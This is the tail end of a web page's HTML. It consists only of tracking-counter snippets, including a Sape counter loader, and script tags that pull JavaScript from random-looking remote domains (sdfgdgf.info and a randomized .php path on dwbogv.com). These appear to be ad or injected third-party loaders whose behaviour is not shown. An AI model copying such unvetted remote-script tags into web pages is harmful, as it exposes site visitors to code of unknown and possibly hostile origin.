<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
